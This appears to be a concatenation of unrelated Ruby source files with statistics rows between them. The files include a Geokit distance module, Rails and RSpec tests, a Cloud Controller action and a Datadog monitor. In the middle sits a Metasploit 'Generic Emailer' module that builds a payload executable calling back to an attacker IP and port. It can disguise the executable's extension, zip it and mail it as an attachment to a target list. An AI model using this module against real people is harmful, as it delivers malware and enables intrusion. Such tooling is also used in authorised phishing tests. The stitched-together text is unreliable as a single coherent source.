# Contains class and instance methods providing distance calcuation services.
# This module is meant to be mixed into classes containing lat and lng
# attributes where distance calculation is desired.
#
# At present, two forms of distance calculations are provided:
#
# * Pythagorean Theory (flat Earth) - which assumes the world is flat and
# loses accuracy over long distances.
# * Haversine (sphere) - which is fairly accurate, but at a performance cost.
#
# Distance units supported are :miles, :kms, and :nms.
module Mappable
# Mix below class methods into the includer.
def self.included(receiver) # :nodoc:
receiver.extend ClassMethods
end
module ClassMethods #:nodoc:
PI_DIV_RAD = Math::PI / 180
EARTH_RADIUS_IN_METERS = 6_376_772.71
METERS_PER_LATITUDE_DEGREE = 111_181.9
EARTH_RADIUS = {}
PER_LATITUDE_DEGREE = {}
# Returns the distance between two points.
# @param from [String, Array, LatLng] +required+ -
# +Geokit::LatLng+ compatible value
# @param to [String, Array, LatLng] +required+ -
# +Geokit::LatLng+ compatible value
# @option options [String, Symbol] :units
# valid values are :miles, :kms, :nms.
# Default to Geokit::default_units
# @option options [String, Symbol] :formula
# valid values are :flat or :sphere.
# Default to Geokit::default_formula
# @example
# Geokit::GeoLoc.distance_between("43.8374249,4.3600687", "44.1253665,4.0852818")
def distance_between(from, to, options = {})
units = get_units!(options)
from = Geokit::LatLng.normalize(from)
to = Geokit::LatLng.normalize(to)
return 0.0 if from == to # fixes a "zero-distance" bug
formula = options[:formula] || Geokit.default_formula
case formula
when :sphere then distance_between_sphere(from, to, units)
when :flat then distance_between_flat(from, to, units)
end
end
def distance_between_sphere(from, to, units)
lat_sin = Math.sin(deg2rad(from.lat)) * Math.sin(deg2rad(to.lat))
lat_cos = Math.cos(deg2rad(from.lat)) * Math.cos(deg2rad(to.lat))
lng_cos = Math.cos(deg2rad(to.lng) - deg2rad(from.lng))
units_sphere_multiplier(units) * Math.acos(lat_sin + lat_cos * lng_cos)
rescue *math_error_classes
0.0
end
def distance_between_flat(from, to, units)
lat_length = units_per_latitude_degree(units) * (from.lat - to.lat)
lng_length = units_per_longitude_degree(from.lat, units) *
(from.lng - to.lng)
Math.sqrt(lat_length**2 + lng_length**2)
end
# Ruby 1.9 raises {Math::DomainError}, but it is not defined in Ruby 1.8
def math_error_classes
return [Errno::EDOM, Math::DomainError] if defined?(Math::DomainError)
[Errno::EDOM]
end
# Returns heading in degrees (0 is north, 90 is east, 180 is south, etc)
# from the first point to the second point. Typicaly, the instance methods
# will be used instead of this method.
def heading_between(from, to)
from = Geokit::LatLng.normalize(from)
to = Geokit::LatLng.normalize(to)
d_lng = deg2rad(to.lng - from.lng)
from_lat = deg2rad(from.lat)
to_lat = deg2rad(to.lat)
y = Math.sin(d_lng) * Math.cos(to_lat)
x = Math.cos(from_lat) * Math.sin(to_lat) -
Math.sin(from_lat) * Math.cos(to_lat) * Math.cos(d_lng)
to_heading(Math.atan2(y, x))
end
# Given a start point, distance, and heading (in degrees), provides
# an endpoint. Returns a LatLng instance. Typically, the instance method
# will be used instead of this method.
def endpoint(start, heading, distance, options = {})
units = get_units!(options)
ratio = distance.to_f / units_sphere_multiplier(units)
start = Geokit::LatLng.normalize(start)
lat = deg2rad(start.lat)
lng = deg2rad(start.lng)
heading = deg2rad(heading)
sin_ratio = Math.sin(ratio)
cos_ratio = Math.cos(ratio)
sin_lat = Math.sin(lat)
cos_lat = Math.cos(lat)
end_lat = Math.asin(sin_lat * cos_ratio +
cos_lat * sin_ratio * Math.cos(heading))
end_lng = lng + Math.atan2(Math.sin(heading) * sin_ratio * cos_lat,
cos_ratio - sin_lat * Math.sin(end_lat))
LatLng.new(rad2deg(end_lat), rad2deg(end_lng))
end
# Returns the midpoint, given two points. Returns a LatLng.
# Typically, the instance method will be used instead of this method.
# Valid option:
# :units - valid values are :miles, :kms, or :nms
# (:miles is the default)
def midpoint_between(from, to, options = {})
from = Geokit::LatLng.normalize(from)
heading = from.heading_to(to)
distance = from.distance_to(to, options)
from.endpoint(heading, distance / 2, options)
end
# Geocodes a location using the multi geocoder.
def geocode(location, options = {})
res = Geocoders::MultiGeocoder.geocode(location, options)
return res if res.success?
raise Geokit::Geocoders::GeocodeError
end
# Given a decimal degree like -87.660333
# return a 3-element array like [ -87, 39, 37.198... ]
def decimal_to_dms(deg)
return false unless deg.is_a?(Numeric)
# seconds is 0...3599.999, representing the entire fractional part.
seconds = (deg.abs % 1.0) * 3600.0
[
deg.to_i, # degrees as positive or negative integer
(seconds / 60).to_i, # minutes as positive integer
(seconds % 60) # seconds as positive float
]
end
def deg2rad(degrees)
degrees.to_f / 180.0 * Math::PI
end
def rad2deg(rad)
rad.to_f * 180.0 / Math::PI
end
def to_heading(rad)
(rad2deg(rad) + 360) % 360
end
def self.register_unit(key, in_meters)
EARTH_RADIUS[key] = EARTH_RADIUS_IN_METERS * in_meters
PER_LATITUDE_DEGREE[key] = METERS_PER_LATITUDE_DEGREE * in_meters
end
register_unit :meters, 1
register_unit :kms, 1 / 1000.0
register_unit :miles, 1 / 1609.0
register_unit :nms, 0.0005400722448725917
# Returns the multiplier used to obtain the correct distance units.
# TODO: make more accurate by coping
# http://msi.nga.mil/MSISiteContent/StaticFiles/Calculators/degree.html
def units_sphere_multiplier(units)
EARTH_RADIUS[units]
end
# Returns the number of units per latitude degree.
def units_per_latitude_degree(units)
PER_LATITUDE_DEGREE[units]
end
# Returns the number units per longitude degree.
def units_per_longitude_degree(lat, units)
units_sphere_multiplier(units) * Math.cos(lat * PI_DIV_RAD) * PI_DIV_RAD
end
# Extracts units from options. Returns Geokit::default_units when not present.
# Raise an exception when given unsupported unit of length
def get_units!(options = {})
units = options[:units]
units = Geokit.default_units if units.nil?
[:miles, :kms, :meters, :nms].include?(units) or
raise ArgumentError, "#{units} is an unsupported unit of length."
units
end
end
# -----------------------------------------------------------------------------------------------
# Instance methods below here
# -----------------------------------------------------------------------------------------------
# Extracts a LatLng instance. Use with models that are acts_as_mappable
def to_lat_lng
if instance_of?(Geokit::LatLng) || instance_of?(Geokit::GeoLoc)
return self
end
lat = send(self.class.lat_column_name)
lng = send(self.class.lng_column_name)
LatLng.new(lat, lng)
end
# Returns the distance from another point. The other point parameter is
# required to have lat and lng attributes. Valid options are:
# :units - valid values are :miles, :kms, :or :nms (:miles is the default)
# :formula - valid values are :flat or :sphere (:sphere is the default)
def distance_to(other, options = {})
self.class.distance_between(self, other, options)
end
alias_method :distance_from, :distance_to
# Returns heading in degrees (0 is north, 90 is east, 180 is south, etc) to
# the given point. The given point can be a LatLng or a string to be
# Geocoded
def heading_to(other)
self.class.heading_between(self, other)
end
# Returns heading in degrees (0 is north, 90 is east, 180 is south, etc)
# FROM the given point. The given point can be a LatLng or a string to be
# Geocoded
def heading_from(other)
self.class.heading_between(other, self)
end
# Returns the endpoint, given a heading (in degrees) and distance.
# Valid option:
# :units - valid values are :miles, :kms, or :nms (:miles is the default)
def endpoint(heading, distance, options = {})
self.class.endpoint(self, heading, distance, options)
end
# Returns the midpoint, given another point on the map.
# Valid option:
# :units - valid values are :miles, :kms, or :nms (:miles is the default)
def midpoint_to(other, options = {})
self.class.midpoint_between(self, other, options)
end
end
end
| 38.023715 | 101 | 0.625052 |
336801806c110f318fa0bfdb6f7246e2596b3240 | 2,006 | require 'rails_helper'
RSpec.feature "AccessExistingDemos", type: :feature do
before do
t = Template.create!(name: "Windows 7 Enterprise SP1 64-bit - Sysprepped", skytap_id: 248757, region_name: 'US-East')
@demo = Demo.create!(template: t, email: '[email protected]')
end
scenario "User confirms after confirmation expired" do
@demo.update!(confirmation_expiration: 1.day.ago)
visit(@demo.url)
expect(page).to have_content("Your demo has expired")
end
scenario "User access after usage expired" do
@demo.update!(usage_expiration: 1.day.ago)
visit(@demo.url)
expect(page).to have_content("Your demo has expired")
end
scenario "User accesses existing demo that isn't provisioned yet" do
@demo.provisioning!
visit(@demo.url)
expect(page).to have_content("Please wait while your demo is provisioned")
end
scenario "User accesses existing demo successfully" do
@demo.update!(status: :provisioned, skytap_id: 123456, published_url: 'http://bogus/url')
visit(@demo.url)
expect(page).to have_content("Your demo is available")
expect(page).to have_link("Access Demo", href: 'http://bogus/url')
end
scenario "User accesses existing demo in an error state" do
@demo.update!(status: :error, skytap_id: 123456, provisioning_error: 'something bad happened')
visit(@demo.url)
expect(page).to have_content("An error has occurred")
expect(page).to have_content("something bad happened")
end
scenario "Demo status is updated in real time", js: true do
@demo.provisioning!
visit(@demo.url)
expect(page).to have_content("Please wait while your demo is provisioned")
@demo.update!(status: :provisioned, skytap_id: 123456, published_url: 'http://bogus/url')
sleep 10
expect(page).not_to have_content("Please wait while your demo is provisioned")
expect(page).to have_content("Your demo is available")
expect(page).to have_link("Access Demo", href: 'http://bogus/url')
end
end
| 32.885246 | 125 | 0.710369 |
6a1d9ad02032f22a363eca802c39a9e7c5391160 | 1,255 | module VCAP::CloudController
class AppCreate
class InvalidApp < StandardError; end
def initialize(user_audit_info)
@user_audit_info = user_audit_info
@logger = Steno.logger('cc.action.app_create')
end
def create(message, lifecycle)
app = nil
AppModel.db.transaction do
app = AppModel.create(
name: message.name,
space_guid: message.space_guid,
environment_variables: message.environment_variables,
)
lifecycle.create_lifecycle_data_model(app)
raise CloudController::Errors::ApiError.new_from_details('CustomBuildpacksDisabled') if using_disabled_custom_buildpack?(app)
Repositories::AppEventRepository.new.record_app_create(
app,
app.space,
@user_audit_info,
message.audit_hash
)
end
app
rescue Sequel::ValidationFailed => e
raise InvalidApp.new(e.message)
end
private
def using_disabled_custom_buildpack?(app)
app.lifecycle_data.using_custom_buildpack? && custom_buildpacks_disabled?
end
def custom_buildpacks_disabled?
VCAP::CloudController::Config.config[:disable_custom_buildpacks]
end
end
end
| 26.702128 | 133 | 0.669323 |
218c754c63040fd3443be02433030feac26f3da7 | 7,045 | ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'yaml'
class Metasploit3 < Msf::Auxiliary
#
# This module sends email messages via smtp
#
include Msf::Exploit::Remote::SMTPDeliver
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'Generic Emailer (SMTP)',
'Description' => %q{
This module can be used to automate email delivery.
This code is based on Joshua Abraham's email script for social
engineering.
},
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://spl0it.org/' ],
],
'Author' => [ 'et <et[at]metasploit.com>' ]))
register_options(
[
OptString.new('RHOST', [true, "SMTP server address",'127.0.0.1']),
OptString.new('RPORT', [true, "SMTP server port",'25']),
OptString.new('YAML_CONFIG', [true, "Full path to YAML Configuration file",
File.join(Msf::Config.install_root, "data","emailer_config.yaml")]),
], self.class)
# Hide this option from the user
deregister_options('MAILTO')
deregister_options('SUBJECT')
end
def load_yaml_conf
opts = {}
File.open(datastore['YAML_CONFIG'], "rb") do |f|
yamlconf = YAML::load(f)
opts['to'] = yamlconf['to']
opts['from'] = yamlconf['from']
opts['subject'] = yamlconf['subject']
opts['type'] = yamlconf['type']
opts['msg_file'] = yamlconf['msg_file']
opts['wait'] = yamlconf['wait']
opts['add_name'] = yamlconf['add_name']
opts['sig'] = yamlconf['sig']
opts['sig_file'] = yamlconf['sig_file']
opts['attachment'] = yamlconf['attachment']
opts['attachment_file'] = yamlconf['attachment_file']
opts['attachment_file_type'] = yamlconf['attachment_file_type']
opts['attachment_file_name'] = yamlconf['attachment_file_name']
### payload options ###
opts['make_payload'] = yamlconf['make_payload']
opts['zip_payload'] = yamlconf['zip_payload']
opts['msf_port'] = yamlconf['msf_port']
opts['msf_ip'] = yamlconf['msf_ip']
opts['msf_payload'] = yamlconf['msf_payload']
opts['msf_filename'] = yamlconf['msf_filename']
opts['msf_change_ext'] = yamlconf['msf_change_ext']
opts['msf_payload_ext'] = yamlconf['msf_payload_ext']
end
opts
end
def load_file(fname)
buf = ''
File.open(fname, 'rb') do |f|
buf = f.read
end
buf
end
def run
yamlconf = load_yaml_conf
fileto = yamlconf['to']
from = yamlconf['from']
subject = yamlconf['subject']
type = yamlconf['type']
msg_file = yamlconf['msg_file']
wait = yamlconf['wait']
add_name = yamlconf['add_name']
sig = yamlconf['sig']
sig_file = yamlconf['sig_file']
attachment = yamlconf['attachment']
attachment_file = yamlconf['attachment_file']
attachment_file_type = yamlconf['attachment_file_type']
attachment_file_name = yamlconf['attachment_file_name']
make_payload = yamlconf['make_payload']
zip_payload = yamlconf['zip_payload']
msf_port = yamlconf['msf_port']
msf_ip = yamlconf['msf_ip']
msf_payload = yamlconf['msf_payload']
msf_filename = yamlconf['msf_filename']
msf_change_ext = yamlconf['msf_change_ext']
msf_payload_ext = yamlconf['msf_payload_ext']
tmp = Dir.tmpdir
datastore['MAILFROM'] = from
msg = load_file(msg_file)
email_sig = load_file(sig_file)
if (type !~ /text/i and type !~ /text\/html/i)
print_error("YAML config: #{type}")
end
if make_payload
attachment_file = File.join(tmp, msf_filename)
attachment_file_name = msf_filename
print_status("Creating payload...")
mod = framework.payloads.create(msf_payload)
if (not mod)
print_error("Failed to create payload, #{msf_payload}")
return
end
# By not passing an explicit encoder, we're asking the
# framework to pick one for us. In general this is the best
# way to encode.
buf = mod.generate_simple(
'Format' => 'raw',
'Options' => { "LHOST"=>msf_ip, "LPORT"=>msf_port }
)
exe = generate_payload_exe({
:code => buf,
:arch => mod.arch,
:platform => mod.platform
})
print_status("Writing payload to #{attachment_file}")
# XXX If Rex::Zip will let us zip a buffer instead of a file,
# there's no reason to write this out
File.open(attachment_file, "wb") do |f|
f.write(exe)
end
if msf_change_ext
msf_payload_newext = attachment_file
msf_payload_newext = msf_payload_newext.sub(/\.\w+$/, ".#{msf_payload_ext}")
File.rename(attachment_file, msf_payload_newext)
attachment_file = msf_payload_newext
end
if zip_payload
zip_file = attachment_file.sub(/\.\w+$/, '.zip')
system("zip -r #{zip_file} #{attachment_file}> /dev/null 2>&1");
attachment_file = zip_file
attachment_file_type = 'application/zip'
else
attachment_file_type = 'application/exe'
end
end
File.open(fileto, 'rb').each do |l|
next if l !~ /\@/
nem = l.split(',')
name = nem[0].split(' ')
fname = name[0]
lname = name[1]
email = nem[1]
if add_name
email_msg_body = "#{fname},\n\n#{msg}"
else
email_msg_body = msg
end
if sig
data_sig = load_file(sig_file)
email_msg_body = "#{email_msg_body}\n#{data_sig}"
end
print_status("Emailing #{name[0]} #{name[1]} at #{email}")
mime_msg = Rex::MIME::Message.new
mime_msg.mime_defaults
mime_msg.from = from
mime_msg.to = email
datastore['MAILTO'] = email.strip
mime_msg.subject = subject
mime_msg.add_part(Rex::Text.encode_base64(email_msg_body, "\r\n"), type, "base64", "inline")
if attachment
if attachment_file_name
data_attachment = load_file(attachment_file)
mime_msg.add_part(Rex::Text.encode_base64(data_attachment, "\r\n"), attachment_file_type, "base64", "attachment; filename=\"#{attachment_file_name}\"")
end
end
send_message(mime_msg.to_s)
select(nil,nil,nil,wait)
end
print_status("Email sent..")
end
end
| 30.899123 | 161 | 0.576579 |
f7a43f7b1e773b4b2a5a0d66eba280f8096aa427 | 972 | require 'test_helper'
class SetupsControllerTest < ActionController::TestCase
setup do
@setup = setups(:one)
end
test "should get index" do
get :index
assert_response :success
assert_not_nil assigns(:setups)
end
test "should get new" do
get :new
assert_response :success
end
test "should create setup" do
assert_difference('Setup.count') do
post :create, setup: { }
end
assert_redirected_to setup_path(assigns(:setup))
end
test "should show setup" do
get :show, id: @setup
assert_response :success
end
test "should get edit" do
get :edit, id: @setup
assert_response :success
end
test "should update setup" do
patch :update, id: @setup, setup: { }
assert_redirected_to setup_path(assigns(:setup))
end
test "should destroy setup" do
assert_difference('Setup.count', -1) do
delete :destroy, id: @setup
end
assert_redirected_to setups_path
end
end
| 19.44 | 55 | 0.676955 |
e21b9dd7800219ad63feee66016f37da28bab94d | 566 | class AboutUsPage < Fae::StaticPage
@slug = 'about_us'
# required to set the has_one associations, Fae::StaticPage will build these associations dynamically
def self.fae_fields
{
header: { type: Fae::TextField, validates: { presence: true } },
introduction: { type: Fae::TextArea },
body: {
type: Fae::TextArea,
languages: [:en, :zh],
validates: {
length: {
maximum: 150
}
}
},
header_image: { type: Fae::Image, languages: Fae.languages.keys }
}
end
end | 24.608696 | 103 | 0.574205 |
184bd94b75906bacef1a79da5e99e63ac2b59df4 | 1,096 | require 'test/unit'
require 'mocha/setup'
require_relative '../../../../lib/fluent_command_builder'
class PathTest < Test::Unit::TestCase
include FluentCommandBuilder
def test_should_join_path_on_initialize
p = Path.new 'a', 'b'
assert_equal 'a/b', p.path
end
def test_should_normalise_path_on_unix
ENV['WINDIR'] = nil
p = Path.new '\\path'
assert_equal '/path', p.normalised_path
end
def test_should_normalise_path_on_windows
ENV['WINDIR'] = 'C:\\Windows'
p = Path.new 'C:/path'
assert_equal 'C:\\path', p.normalised_path
end
unless ENV['WINDIR']
def test_should_evaluate_path_on_unix
p = Path.new '$command_path'
ENV['command_path'] = '/path'
assert_equal '/path', p.evaluated_path
end
end
if ENV['WINDIR']
def test_should_evaluate_path_on_windows
p = Path.new '%command_path%'
ENV['command_path'] = 'C:\\path'
assert_equal 'C:\\path', p.evaluated_path
end
end
def test_should_ignore_empty_path_entries
p = Path.new '', 'command'
assert_equal 'command', p.path
end
end | 23.826087 | 57 | 0.676095 |
2151e783abacd9421ca8094bd4e8afce4d3e326c | 342 | name "#{@hostinfo[:role]}: swap usage > 50%"
message "A #{@hostinfo[:role]} machine is swapping heavily"
applies { @hostinfo[:role] }
notify.groups @hostinfo[:owner_groups]
notify.people @hostinfo[:owners]
metric.datadog_query <<EOQ
avg(last_10m):avg:system.swap.pct_free{chef_role:#{@hostinfo[:role]}} by {host} < 0.5
EOQ
silenced false
| 24.428571 | 85 | 0.722222 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.